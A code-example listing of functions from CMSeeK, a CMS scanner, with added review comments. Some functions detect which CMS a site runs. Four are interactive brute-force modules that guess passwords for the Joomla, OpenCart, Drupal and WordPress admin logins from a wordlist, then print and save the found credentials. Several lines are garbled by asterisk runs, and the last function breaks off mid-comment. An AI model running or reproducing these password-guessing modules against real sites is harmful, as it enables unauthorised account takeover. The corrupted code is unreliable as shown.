Exemplo n.º 1
def start():
    """Run the interactive Joomla admin-login password guessing module.

    Flow visible in this listing: prompt for a target, fetch it, confirm
    the CMS through ``source.generator`` / ``source.check`` /
    ``header.check``, fetch ``/administrator/index.php`` and require a
    ``<form`` in it, prompt for a comma-separated username list, then walk
    the lines of ``wordlist/passwords.txt`` for each user. A response whose
    body contains ``logout`` is treated as a successful login and the pair
    is passed to ``cmseek.savebrute``.

    NOTE(review): three statements below are corrupted in this listing (a
    ``******`` run replaced part of each line), so the function does not
    parse as shown. The statement that assigns ``cursrc`` (the login
    request) is not visible here.

    Defensive reading: the visible loop tries wordlist entries one after
    another with no delay or attempt cap, so rate limiting, lockout or a
    second factor on the admin login is the control that bounds it.
    """
    cmseek.clearscreen()
    cmseek.banner("Joomla Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for Joomla")
    bsrc = cmseek.getsource(url, cmseek.randomua('foodislove'))
    if bsrc[0] != '1':
        cmseek.error("Could not get target source, CMSeek is quitting")
        # NOTE(review): presumably handle_quit() ends the process. If it
        # returns, joomcnf is never assigned and the check further down
        # raises UnboundLocalError -- confirm against cmseek.handle_quit.
        cmseek.handle_quit()
    else:
        # Three confirmation attempts, each only tried when the previous one
        # did not report the 'joom' id: generator tag, source checks, headers.
        try1 = source.generator(bsrc[1])
        if try1[0] == '1' and try1[1] == 'joom':
            joomcnf = '1'
        else:
            try2 = source.check(bsrc[1], url)
            if try2[0] == '1' and try2[1] == 'joom':
                joomcnf = '1'
            else:
                try3 = header.check(bsrc[2])  # Headers Check!
                # NOTE(review): both branches below assign drucnf, a name
                # that is not read anywhere in this function. joomcnf stays
                # unassigned on this path, so `joomcnf != '1'` below raises
                # UnboundLocalError instead of reporting "could not confirm".
                if try3[0] == '1' and try3[1] == 'joom':
                    drucnf = '1'
                else:
                    drucnf = '0'
    if joomcnf != '1':
        cmseek.error('Could not confirm Joomla... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success(
            "Joomla Confirmed... Confirming form and getting token...")
        joomloginsrc = cmseek.getsource(url + '/administrator/index.php',
                                        cmseek.randomua('thatsprettygay'))
        if joomloginsrc[0] == '1' and '<form' in joomloginsrc[1]:
            # The token extraction below is disabled; nothing in the visible
            # code reads a hidden form token from the login page.
            # joomtoken = re.findall(r'type=\"hidden\" name=\"(.*?)\" value=\"1\"', joomloginsrc[1])
            # if len(joomtoken) == 0:
            #    cmseek.error('Unable to get token... CMSeek is quitting!')
            #    cmseek.handle_quit()
            # cmseek.success("Token grabbed successfully: " + cmseek.bold + joomtoken[0] + cmseek.cln)
            # token = joomtoken[0]
            joomparamuser = []
            # The operator's answer is split on ',' only; surrounding spaces
            # and empty entries are kept as typed.
            rawuser = input(
                "[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
            ).split(',')
            for rusr in rawuser:
                joomparamuser.append(rusr)
            joombruteusers = set(
                joomparamuser
            )  ## Strip duplicate usernames in case any smartass didn't read the full thing and entered admin as well
            for user in joombruteusers:
                passfound = '0'  # '1' once a password for this user matched
                print('\n')
                # NOTE(review): corrupted line -- the end of the info() call
                # and the start of the statement that opens the wordlist
                # (pwd_file, read on the next line) are missing. No close()
                # for pwd_file is visible in this function.
                cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
                passwords = pwd_file.read().split('\n')
                for password in passwords:
                    # Skip blank wordlist lines.
                    if password != '' and password != '\n':
                        # NOTE(review): corrupted line, see the docstring.
                        sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
                        sys.stdout.flush()
                        # NOTE(review): the next line is also corrupted; the
                        # assignment of cursrc that the check below relies on
                        # is not visible in this listing.
                        # print("Testing Pass: "******"Ret URL: " + str(cursrc[3]))
                        # Success heuristic: the word 'logout' appears in the
                        # response body held in cursrc[1].
                        if 'logout' in str(cursrc[1]):
                            print('\n')
                            cmseek.success('Password found!')
                            print(" |\n |--[username]--> " + cmseek.bold +
                                  user + cmseek.cln +
                                  "\n |\n |--[password]--> " + cmseek.bold +
                                  password + cmseek.cln + "\n |")
                            cmseek.success('Enjoy The Hunt!')
                            cmseek.savebrute(url,
                                             url + '/administrator/index.php',
                                             user, password)
                            passfound = '1'
                            break
                        else:
                            continue
                        # Unreachable: both branches above already left this
                        # iteration (break / continue).
                        break
                if passfound == '0':
                    cmseek.error('\n\nCould Not find Password!')
                print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            cmseek.handle_quit()
Exemplo n.º 2
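def main_proc(site, cua):
    """Identify the CMS running on *site* and run the follow-up it supports.

    The page is fetched once with ``cmseek.getsource``. Three detectors are
    then tried in order -- response headers, the generator meta tag, and
    page-source checks -- and the first one that reports a CMS id wins.
    The id is looked up on ``cmsdb``; depending on the entry's ``deeps`` and
    ``vd`` flags the function hands off to ``advanced.start``, runs
    ``version_detect.start``, or prints the basic result.

    Fix over the previous revision: the source-code stage used to hang off
    the ``else`` of the generator stage. It therefore ran (and could
    overwrite the result) after a successful header detection, and was
    skipped entirely when a generator tag existed but did not identify the
    CMS. Each stage now runs only while nothing has been detected yet.

    Args:
        site: Target URL as entered by the operator.
        cua: User-Agent string sent with the request.

    Returns:
        None. Results are printed and recorded via ``cmseek.update_log``.
    """
    cmseek.clearscreen()
    cmseek.banner("CMS Detection And Deep Scan")
    cmseek.info("Scanning Site: " + site)
    cmseek.statement("User Agent: " + cua)
    cmseek.statement("Collecting Headers and Page Source for Analysis")
    init_source = cmseek.getsource(site, cua)
    if init_source[0] != '1':
        cmseek.error(
            "Aborting CMSeek! Couldn't connect to site \n    Error: %s" %
            init_source[1])
        return

    scode = init_source[1]
    headers = init_source[2]
    landed_on = init_source[3]  # presumably the URL after redirects
    if site != landed_on and site + '/' != landed_on:
        # A redirect can leave the host the operator asked for, so the new
        # location only becomes the target after explicit confirmation.
        cmseek.info('Target redirected to: ' + cmseek.bold +
                    cmseek.fgreen + landed_on + cmseek.cln)
        follow_redir = input('[#] Set ' + cmseek.bold + cmseek.fgreen +
                             landed_on + cmseek.cln +
                             ' as target? (y/n): ')
        if follow_redir.lower() == 'y':
            site = landed_on
    if scode == '':
        # Nothing to analyse; every later stage needs page source.
        cmseek.error('Aborting detection, source code empty')
        return

    cmseek.statement("Detection Started")

    cms = ''  # the cms id if detected
    cms_detected = '0'  # '1' once any stage reported a CMS
    detection_method = ''  # name of the stage that succeeded
    # '1' when the page mentions a generator tag at all; also forwarded to
    # the deep-scan / version modules.
    ga = '1' if ('generator' in scode or 'Generator' in scode) else '0'

    cmseek.statement("Using headers to detect CMS (Stage 1 of 3)")
    header_detection = header.check(headers)
    if header_detection[0] == '1':
        detection_method = 'header'
        cms = header_detection[1]
        cms_detected = '1'

    if cms_detected == '0' and ga == '1':
        cmseek.statement(
            "Using Generator meta tag to detect CMS (Stage 2 of 3)")
        gen_detection = source.generator(scode)
        if gen_detection[0] == '1':
            detection_method = 'generator'
            cms = gen_detection[1]
            cms_detected = '1'

    if cms_detected == '0':
        # Last resort: runs whenever the earlier stages found nothing,
        # whether or not a generator tag was present.
        cmseek.statement("Using source code to detect CMS (Stage 3 of 3)")
        source_check = source.check(scode, site)
        if source_check[0] == '1':
            detection_method = 'source'
            cms = source_check[1]
            cms_detected = '1'

    if cms_detected == '1':
        cmseek.success('CMS Detected, CMS ID: ' + cmseek.bold + cms +
                       cmseek.cln + ', Detection method: ' + cmseek.bold +
                       detection_method + cmseek.cln)
        cmseek.update_log('detection_param', detection_method)
        cmseek.update_log('cms_id', cms)  # update log
        cmseek.statement('Getting CMS info from databse')
        # The id comes from the detector modules and names an attribute of
        # cmsdb; an id without an entry raises AttributeError here.
        cms_info = getattr(cmsdb, cms)
        if cms_info['deeps'] == '1':
            advanced.start(cms, site, cua, ga, scode)
            return

        # No deep scan for this CMS: print the summary, with a version when
        # version detection exists and returned something other than '0'.
        cms_version = '0'
        if cms_info['vd'] == '1':
            cmseek.success('Version detection available')
            cms_version = version_detect.start(cms, site, cua, ga, scode)
        cmseek.clearscreen()
        cmseek.banner("CMS Scan Results")
        cmseek.result('Target: ', site)
        cmseek.result("Detected CMS: ", cms_info['name'])
        cmseek.update_log('cms_name', cms_info['name'])  # update log
        if cms_version != '0':
            cmseek.result("CMS Version: ", cms_version)
            cmseek.update_log('cms_version', cms_version)  # update log
        cmseek.result("CMS URL: ", cms_info['url'])
        cmseek.update_log('cms_url', cms_info['url'])  # update log
        return
    else:
        print('\n')
        cmseek.error(
            'CMS Detection failed, if you know the cms please help me improve CMSeeK by reporting the cms along with the target by creating an issue'
        )
        print('''
{2}Create issue:{3} https://github.com/Tuhinshubhra/CMSeeK/issues/new

{4}Title:{5} [SUGGESTION] CMS detction failed!
{6}Content:{7}
    - CMSeeK Version: {0}
    - Target: {1}
    - Probable CMS: <name and/or cms url>

N.B: Create issue only if you are sure, please avoid spamming!
        '''.format(cmseek.cmseek_version, site, cmseek.bold, cmseek.cln,
                   cmseek.bold, cmseek.cln, cmseek.bold, cmseek.cln))
        return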
Exemplo n.º 3
def start():
    """Run the interactive OpenCart admin-login password guessing module.

    Flow visible in this listing: prompt for a target, fetch it, confirm
    the CMS through ``source.generator`` / ``source.check``, fetch
    ``/admin/index.php`` and require both ``<form`` and
    ``route=common/login`` in it, prompt for a comma-separated username
    list, then walk the lines of ``wordlist/passwords.txt`` for each user
    through ``testlogin``. A result whose fourth element contains
    ``route=common/dashboard&user_token=`` is treated as a successful login
    and the pair is passed to ``cmseek.savebrute``.

    NOTE(review): two statements below are corrupted in this listing (a
    ``******`` run replaced part of each line), so the function does not
    parse as shown.

    Defensive reading: the visible loop tries wordlist entries one after
    another with no delay or attempt cap, so rate limiting, lockout or a
    second factor on the admin login is the control that bounds it.
    """
    cmseek.clearscreen()
    cmseek.banner("OpenCart Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for OpenCart")
    bsrc = cmseek.getsource(url, cmseek.randomua('foodislove'))
    if bsrc[0] != '1':
        cmseek.error("Could not get target source, CMSeek is quitting")
        # NOTE(review): presumably handle_quit() ends the process. If it
        # returns, occnf is never assigned and the check below raises
        # UnboundLocalError -- confirm against cmseek.handle_quit.
        cmseek.handle_quit()
    else:
        # Two confirmation attempts: generator tag first, then the other
        # source checks; both must report the 'oc' id.
        try1 = source.generator(bsrc[1])
        if try1[0] == '1' and try1[1] == 'oc':
            occnf = '1'
        else:
            try2 = source.check(bsrc[1], url)
            if try2[0] == '1' and try2[1] == 'oc':
                occnf = '1'
            else:
                occnf = '0'
    if occnf != '1':
        cmseek.error('Could not confirm OpenCart... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success(
            "OpenCart Confirmed... Checking for OpenCart login form")
        ocloginsrc = cmseek.getsource(url + '/admin/index.php',
                                      cmseek.randomua('thatsprettygay'))
        if ocloginsrc[0] == '1' and '<form' in ocloginsrc[
                1] and 'route=common/login' in ocloginsrc[1]:
            cmseek.success("Login form found!")
            # Seeded with '' so the set always holds the empty name; the
            # loop below skips it explicitly.
            ocparamuser = ['']
            # The operator's answer is split on ',' only; surrounding spaces
            # are kept as typed.
            rawuser = input(
                "[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
            ).split(',')
            for rusr in rawuser:
                ocparamuser.append(rusr)
            ocbruteusers = set(ocparamuser)  ## Strip duplicate usernames

            for user in ocbruteusers:
                if user != '':
                    passfound = '0'  # '1' once a password for this user matched
                    print('\n')
                    # NOTE(review): corrupted line -- the end of the info()
                    # call and the start of the statement that opens the
                    # wordlist (pwd_file, read on the next line) are missing.
                    # No close() for pwd_file is visible in this function.
                    cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
                    passwords = pwd_file.read().split('\n')
                    for password in passwords:
                        # Skip blank wordlist lines.
                        if password != '' and password != '\n':
                            # NOTE(review): corrupted line, see the docstring.
                            sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
                            sys.stdout.flush()
                            # testlogin is defined outside this listing.
                            cursrc = testlogin(url, user, password)
                            # Success heuristic: cursrc[3] (presumably the
                            # URL the login ended on) points at the dashboard
                            # route with a user_token parameter.
                            if 'route=common/dashboard&user_token=' in str(
                                    cursrc[3]):
                                cmseek.success('Password found!')
                                print(" |\n |--[username]--> " + cmseek.bold +
                                      user + cmseek.cln +
                                      "\n |\n |--[password]--> " +
                                      cmseek.bold + password + cmseek.cln +
                                      "\n |")
                                cmseek.success('Enjoy The Hunt!')
                                cmseek.savebrute(url, url + '/admin/index.php',
                                                 user, password)
                                passfound = '1'
                                break
                            else:
                                continue
                            # Unreachable: both branches above already left
                            # this iteration (break / continue).
                            break
                    if passfound == '0':
                        cmseek.error('\n\nCould Not find Password!')
                    print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            cmseek.handle_quit()
Exemplo n.º 4
def main_proc(site, cua):
    """Detect the CMS on *site* and print or hand off the result.

    Detection order: response headers (stage 1), then the generator meta
    tag (2.1) when the page mentions one, then the page-source checks
    (2.2). The first detector that returns status ``'1'`` decides the CMS
    id, which is looked up on ``cmsdb``. Entries with ``deeps == '1'`` are
    passed to ``advanced.start``; otherwise the name, the version (when
    ``vd == '1'`` and detection returns something other than ``'0'``) and
    the link are printed and logged.

    Args:
        site: Target URL; replaced by the redirect location if the operator
            confirms it.
        cua: User-Agent string used for the request.

    Returns:
        None.
    """

    def show(label, value):
        # One highlighted line of the result listing.
        cmseek.result('', label + cmseek.bold + cmseek.fgreen + value + cmseek.cln)

    def handle_detection(cms_id, method, vd_flag, deep_flag):
        # Shared tail of every successful detection: log it, look the id up
        # on cmsdb, then deep-scan or print the summary.
        cmseek.success("CMS Detected, CMS ID: \"%s\" - looking up database for CMS information" % cms_id)
        cmseek.update_log('detection_param', method)
        cmseek.update_log('cms_id', cms_id)
        entry = getattr(cmsdb, cms_id)
        if entry['deeps'] == '1':
            advanced.start(cms_id, site, cua, deep_flag, scode)
            return
        found_version = '0'
        if entry['vd'] == '1':
            cmseek.statement("CMS Version is detectable, detecting CMS Version")
            found_version = version_detect.start(cms_id, site, cua, vd_flag, scode)
        print('\n')
        show("CMS Name: ", entry['name'])
        cmseek.update_log('cms_name', entry['name'])
        if found_version != '0':
            show("CMS Version: ", found_version)
            cmseek.update_log('cms_version', found_version)
        show("CMS Link: ", entry['url'])
        cmseek.update_log('cms_url', entry['url'])

    cmseek.clearscreen()
    cmseek.banner("CMS Detection And Deep Scan")
    cmseek.info("Scanning Site: " + site)
    cmseek.statement("User Agent: " + cua)
    cmseek.statement("Collecting Headers and Page Source for Analysis")
    fetched = cmseek.getsource(site, cua)
    if fetched[0] != '1':
        cmseek.error("Aborting CMSeek! Couldn't connect to site \n    Error: %s" % fetched[1])
        return

    scode = fetched[1]
    headers = fetched[2]
    if site != fetched[3] and site + '/' != fetched[3]:
        # The request ended somewhere else; switching target is the
        # operator's call.
        cmseek.info('Target redirected to: ' + cmseek.bold + cmseek.fgreen + fetched[3] + cmseek.cln)
        answer = input('[#] Set ' + cmseek.bold + cmseek.fgreen + fetched[3] + cmseek.cln + ' as target? (y/n): ')
        if answer.lower() == 'y':
            site = fetched[3]

    cmseek.statement("Detection Started")
    cmseek.statement("Using headers to detect CMS (Stage 1 of 2)")
    by_header = header.check(headers)
    if by_header[0] == "1":
        # Per the original comment, '2' tells the deep scan that the
        # generator check has not been performed.
        handle_detection(by_header[1], 'header', '1', '2')
        return

    cmseek.warning('No luck with headers... Continuing with source code')
    cmseek.statement("Checking for generator meta tag in source code")
    if 'Generator' in scode or 'generator' in scode:
        cmseek.success("Generator meta tag found.. Continuing with detection (2.1 of 2.2)")
        by_generator = source.generator(scode)
        if by_generator[0] == '1':
            handle_detection(by_generator[1], 'generator', '1', '1')
            return
        if by_generator[0] == '2':  # empty source code
            cmseek.error("Source code was empty... exiting CMSeek")
            return
        cmseek.warning('Could not detect CMS from the generator meta tag, (Procceeding with scan 2.2 of 2.2)')
        generator_flag = '1'
    else:
        cmseek.warning("Generator meta tag not found! (Procceeding with scan 2.2 of 2.2)")
        generator_flag = '0'

    # Stage 2.2: source checks; the flag records whether a generator tag
    # was present and is forwarded to the follow-up modules.
    by_source = source.check(scode, site)
    if by_source[0] == '1':
        handle_detection(by_source[1], 'source', generator_flag, generator_flag)
    elif by_source[0] == '2':  # empty source code
        cmseek.error("Source code was empty... exiting CMSeek")
    else:
        cmseek.error("Couldn't detect cms... :( \n    Sorry master didn't mean to dissapoint but bye for now \n    Can't handle this much disappintment \n\n")
Exemplo n.º 5
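def main_proc(site, cua):
    """Detect the CMS on *site* and print or hand off the result.

    The page is fetched with ``urllib.request``; detection then runs on the
    response headers (stage 1), the generator meta tag (2.1) when the page
    mentions one, and the page-source checks (2.2). The first detector
    returning status ``'1'`` decides the CMS id, which is looked up on
    ``cmsdb``. Entries with ``deeps == '1'`` go to ``advanced.deep``;
    otherwise the CMS name and link are printed and logged.

    Changes over the previous revision:
      * Only ``http://`` and ``https://`` targets are fetched. ``urlopen``
        also accepts other schemes such as ``file:``, which would read a
        local file and feed it to the detectors.
      * The body is decoded with the charset announced by the response
        (falling back to UTF-8) and undecodable bytes are replaced. A page
        that is not valid UTF-8 used to be reported as a connection error.
      * The result-reporting code that was repeated four times is a helper.

    Args:
        site: Target URL.
        cua: User-Agent string sent with the request.

    Returns:
        None.
    """

    def show(label, value):
        # One highlighted line of the result listing.
        cmseek.result(
            '', label + cmseek.bold + cmseek.fgreen + value + cmseek.cln)

    def handle_detection(cms_id, method, deep_flag):
        # Shared tail of every successful detection: log it, look the id up
        # on cmsdb, then deep-scan or print the summary.
        cmseek.success(
            "CMS Detected, CMS ID: \"%s\" - looking up database for CMS information"
            % cms_id)
        cmseek.update_log('detection_param', method)  # update log
        cmseek.update_log('cms_id', cms_id)  # update log
        cka = getattr(cmsdb, cms_id)
        if cka['deeps'] == '1':
            advanced.deep(cms_id, site, cua, deep_flag, scode)
            return
        if cka['vd'] == '1':
            # This revision only announces version detection; no version
            # module is called here.
            cmseek.statement(
                "CMS Version is detectable, detecting CMS Version")
        print('\n')
        show("CMS Name: ", cka['name'])
        cmseek.update_log('cms_name', cka['name'])  # update log
        show("CMS Link: ", cka['url'])
        cmseek.update_log('cms_url', cka['url'])  # update log

    cmseek.clearscreen()
    cmseek.banner("CMS Detection And Deep Scan")
    cmseek.info("Scanning Site: " + site)
    cmseek.statement("User Agent: " + cua)
    cmseek.statement("Collecting Headers and Page Source for Analysis")

    if not site.lower().startswith(('http://', 'https://')):
        cmseek.error(
            "Aborting CMSeek! Couldn't connect to site \n    Error: %s" %
            "unsupported URL scheme, only http:// and https:// are scanned")
        return

    try:
        ckreq = urllib.request.Request(site,
                                       data=None,
                                       headers={'User-Agent': cua})
        # NOTE(review): no timeout is passed, so a stalled server blocks
        # the scan until the socket default applies.
        with urllib.request.urlopen(ckreq) as response:
            raw_body = response.read()
            info = response.info()
            charset = info.get_content_charset() or 'utf-8'
            headers = str(info)
    except Exception as e:
        # Top-level boundary: any fetch failure ends the scan with a message.
        e = str(e)
        cmseek.error(
            "Aborting CMSeek! Couldn't connect to site \n    Error: %s" %
            e)  #TODO: remove the error msg later if possible
        return

    try:
        scode = raw_body.decode(charset, errors='replace')
    except LookupError:
        # The server announced a charset name Python does not know.
        scode = raw_body.decode('utf-8', errors='replace')
    # TODO: The source code enumartion > save to site directory > print done

    cmseek.statement("Detection Started")
    cmseek.statement("Using headers to detect CMS (Stage 1 of 2)")
    c1 = header.check(headers)
    if c1[0] == "1":
        # Per the original comment, '2' tells the deep scan that the
        # generator check has not been performed.
        handle_detection(c1[1], 'header', '2')
        return

    cmseek.warning('No luck with headers... Continuing with source code')
    cmseek.statement("Checking for generator meta tag in source code")
    if 'Generator' in scode or 'generator' in scode:
        cmseek.success(
            "Generator meta tag found.. Continuing with detection (2.1 of 2.2)"
        )
        c21 = source.generator(scode)
        if c21[0] == '1':
            handle_detection(c21[1], 'generator', '1')
            return
        if c21[0] == '2':  # Empty Source code
            cmseek.error("Source code was empty... exiting CMSeek")
            return
        cmseek.warning(
            'Could not detect CMS from the generator meta tag, (Procceeding with scan 2.2 of 2.2)'
        )
        ga = '1'  # generator tag present but not conclusive
    else:
        cmseek.warning(
            "Generator meta tag not found! (Procceeding with scan 2.2 of 2.2)"
        )
        ga = '0'  # no generator tag on the page

    # Stage 2.2: source checks; ga is forwarded to the deep scan.
    c22 = source.check(scode, site)
    if c22[0] == '1':
        handle_detection(c22[1], 'source', ga)
    elif c22[0] == '2':  # Empty Source code
        cmseek.error("Source code was empty... exiting CMSeek")
    else:
        cmseek.error(
            "Couldn't detect cms... :( \n    Sorry master didn't mean to dissapoint but bye for now \n    Can't handle this much disappintment \n\n"
        )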
Exemplo n.º 6
def start():
    """Interactive entry point of the Drupal bruteforce module.

    Flow, as visible in this function:
      1. Prompt for a target URL and fetch its source.
      2. Confirm the target is Drupal: generator check, then other
         source-code checks, then a response-header check.
      3. Fetch ``/user/login/`` and extract the ``form_id`` hidden field.
      4. Prompt for a comma-separated username list.
      5. For each username, pass wordlist entries to ``testlogin`` until a
         response no longer contains ``/user/login/``.

    A reported hit is printed to the terminal and handed to
    ``cmseek.savebrute``. Takes no arguments and has no explicit return
    value.

    NOTE(review): ``cmseek``, ``source``, ``header``, ``re``, ``sys`` and
    ``testlogin`` are resolved from module scope, which is not part of this
    listing.
    """
    cmseek.clearscreen()
    cmseek.banner("Drupal Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for Drupal")
    # bsrc is indexed as [0] status flag ('1' on success), [1] page source,
    # [2] value handed to header.check() below.
    bsrc = cmseek.getsource(url, cmseek.randomua('onceuponatime'))
    if bsrc[0] != '1':
        cmseek.error("Could not get target source, CMSeek is quitting")
        # NOTE(review): assumes handle_quit() terminates the process; if it
        # returns, drucnf is never assigned and the check below raises
        # NameError — confirm against cmseek.handle_quit.
        cmseek.handle_quit()
    else:
        try1 = source.generator(bsrc[1])  # Confirming Drupal using generator
        if try1[0] == '1' and try1[1] == 'dru':
            drucnf = '1'
        else:
            try2 = source.check(
                bsrc[1],
                url)  # Confirming Drupal using other source code checks
            if try2[0] == '1' and try2[1] == 'dru':
                drucnf = '1'
            else:
                try3 = header.check(bsrc[2])  # Headers Check!
                if try3[0] == '1' and try3[1] == 'dru':
                    drucnf = '1'
                else:
                    drucnf = '0'
    if drucnf != '1':
        cmseek.error('Could not confirm Drupal... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success("Drupal Confirmed... Checking for Drupal login form")
        druloginsrc = cmseek.getsource(
            url + '/user/login/',
            cmseek.randomua('therelivedaguynamedkakashi'))
        # Proceed only if the fetch succeeded and the page contains both a
        # form tag and a form_id hidden field.
        if druloginsrc[0] == '1' and '<form' in druloginsrc[
                1] and 'name="form_id" value="' in druloginsrc[1]:
            cmseek.success("Login form found! Retriving form id value")
            # Non-greedy capture of every form_id value on the page; only
            # the first match is used.
            fid = re.findall(r'name="form_id" value="(.*?)"', druloginsrc[1])
            if fid == []:
                cmseek.error("Could not find form_id, CMSeeK is quitting!")
                # NOTE(review): same assumption as above — form_id stays
                # unbound if handle_quit() returns.
                cmseek.handle_quit()
            else:
                cmseek.success('form_id found: ' + cmseek.bold + fid[0] +
                               cmseek.cln)
                form_id = fid[0]
            # Seeded with an empty string; empty entries are skipped in the
            # loop below.
            druparamuser = ['']
            rawuser = input(
                "[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
            ).split(',')
            for rusr in rawuser:
                druparamuser.append(rusr)
            drubruteusers = set(druparamuser)  # Strip duplicate usernames

            for user in drubruteusers:
                if user != '':
                    print('\n')
                    # NOTE(review): the next line is garbled in this listing —
                    # the text between the message string and the wordlist
                    # path was replaced by asterisks, so the assignment of
                    # pwd_file is not visible. Presumably it opens
                    # "wordlist/passwords.txt" for reading; confirm against
                    # the upstream file. No close() on pwd_file appears in
                    # this function, and the file is re-read for every user.
                    cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
                    passwords = pwd_file.read().split('\n')
                    passfound = '0'
                    for password in passwords:
                        if password != '' and password != '\n':
                            # NOTE(review): this line is garbled in the same
                            # way; it cannot be parsed as shown.
                            sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
                            sys.stdout.flush()
                            cursrc = testlogin(url, user, password, form_id)
                            # print(cursrc)
                            # The only success signal is the absence of
                            # '/user/login/' in the stringified result, so an
                            # error page, a blocked request or an empty body
                            # would also be reported as a found password.
                            # What testlogin returns is not visible here.
                            if '/user/login/' in str(cursrc):
                                continue
                            else:
                                cmseek.success('Password found! \n\n\n')
                                # print (cursrc)
                                cmseek.success('Password found!')
                                # The credential pair is written to the
                                # terminal in clear text.
                                print(" |\n |--[username]--> " + cmseek.bold +
                                      user + cmseek.cln +
                                      "\n |\n |--[password]--> " +
                                      cmseek.bold + password + cmseek.cln +
                                      "\n |")
                                cmseek.success('Enjoy The Hunt!')
                                # NOTE(review): savebrute is defined
                                # elsewhere; if it persists the pair, the
                                # output holds a cleartext credential and
                                # needs handling as a secret.
                                cmseek.savebrute(url, url + '/user/login',
                                                 user, password)
                                passfound = '1'
                                break
                            # Unreachable: both branches above leave the
                            # iteration (continue / break).
                            break
                    if passfound == '0':
                        cmseek.error('\n\nCould Not find Password!')
                    print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            cmseek.handle_quit()
Exemplo n.º 7
Arquivo: wp.py Projeto: zenzue/CMSeeK
def start():
    """Interactive entry point of the WordPress bruteforce module.

    Flow, as visible in this function:
      1. Prompt for a target URL and fetch its source.
      2. Confirm the target is WordPress: generator check, then other
         source-code checks (no header check in this module).
      3. Fetch ``/wp-login.php`` and require a form tag in the response.
      4. Obtain usernames from ``wp_user_enum.start``; if none are
         returned, prompt for a single username.
      5. For each username, pass wordlist entries to ``cmseek.wpbrutesrc``
         until element 3 of its result contains ``wp-admin``.

    A reported hit is printed to the terminal and handed to
    ``cmseek.savebrute``. Takes no arguments and has no explicit return
    value.

    NOTE(review): ``cmseek``, ``source``, ``wp_user_enum`` and ``sys`` are
    resolved from module scope, which is not part of this listing.
    """
    cmseek.clearscreen()
    cmseek.banner("WordPress Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for WordPress")
    # bsrc is indexed as [0] status flag ('1' on success) and [1] page source.
    bsrc = cmseek.getsource(
        url,
        cmseek.randomua('thiscanbeanythingasfarasnowletitbewhatilovethemost'))
    if bsrc[0] != '1':
        # print(bsrc[1])
        cmseek.error("Could not get target source, CMSeek is quitting")
        # NOTE(review): assumes handle_quit() terminates the process; if it
        # returns, wpcnf is never assigned and the check below raises
        # NameError — confirm against cmseek.handle_quit.
        cmseek.handle_quit()
    else:
        try1 = source.generator(bsrc[1])
        if try1[0] == '1' and try1[1] == 'wp':
            wpcnf = '1'
        else:
            try2 = source.check(bsrc[1], url)
            if try2[0] == '1' and try2[1] == 'wp':
                wpcnf = '1'
            else:
                wpcnf = '0'
    if wpcnf != '1':
        # Dumps the whole fetched page source to the terminal before
        # quitting; looks like leftover debug output.
        print(bsrc[1])
        cmseek.error('Could not confirm WordPress... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success(
            "WordPress Confirmed... Checking for WordPress login form")
        wploginsrc = cmseek.getsource(url + '/wp-login.php',
                                      cmseek.randomua('thatsprettygay'))
        if wploginsrc[0] == '1' and '<form' in wploginsrc[1]:
            cmseek.success(
                "Login form found.. Detecting Username For Bruteforce")
            # This initial value is overwritten by uenum[1] below.
            wpparamuser = []
            uenum = wp_user_enum.start('wp', url, cmseek.randomua('r'), '0',
                                       bsrc[1])
            # usernamesgen is not read again in this function.
            usernamesgen = uenum[0]
            # Compared against [] and appended to below, so presumably a
            # list of usernames — confirm against wp_user_enum.start.
            wpparamuser = uenum[1]

            if wpparamuser == []:
                customuser = input(
                    "[~] CMSeek could not enumerate usernames, enter username if you know any: "
                )
                if customuser == "":
                    # Despite the message there is no quit or return here:
                    # the user set stays empty, the loop below is skipped
                    # and the function simply ends.
                    cmseek.error("No user found, CMSeek is quitting")
                else:
                    wpparamuser.append(customuser)
            wpbruteusers = set(wpparamuser)

            for user in wpbruteusers:
                passfound = '0'
                print('\n')
                # NOTE(review): the next line is garbled in this listing —
                # the text between the message string and the wordlist path
                # was replaced by asterisks, so the assignment of pwd_file
                # is not visible. Presumably it opens
                # "wordlist/passwords.txt" for reading; confirm against the
                # upstream file. No close() on pwd_file appears in this
                # function, and the file is re-read for every user.
                cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
                passwords = pwd_file.read().split('\n')
                for password in passwords:
                    if password != '' and password != '\n':
                        # NOTE(review): this line is garbled in the same way;
                        # it cannot be parsed as shown.
                        sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
                        sys.stdout.flush()
                        cursrc = cmseek.wpbrutesrc(url, user, password)
                        # Success is inferred from the substring 'wp-admin'
                        # in element 3 of the result. What that element holds
                        # is not visible here (presumably a final URL or
                        # redirect target — confirm against wpbrutesrc).
                        if 'wp-admin' in str(cursrc[3]):
                            cmseek.success('Password found!')
                            # The credential pair is written to the terminal
                            # in clear text.
                            print(" |\n |--[username]--> " + cmseek.bold +
                                  user + cmseek.cln +
                                  "\n |\n |--[password]--> " + cmseek.bold +
                                  password + cmseek.cln + "\n |")
                            cmseek.success('Enjoy The Hunt!')
                            # NOTE(review): savebrute is defined elsewhere;
                            # if it persists the pair, the output holds a
                            # cleartext credential and needs handling as a
                            # secret.
                            cmseek.savebrute(url, url + '/wp-login.php', user,
                                             password)
                            passfound = '1'
                            break
                        else:
                            continue
                        # Unreachable: both branches above leave the
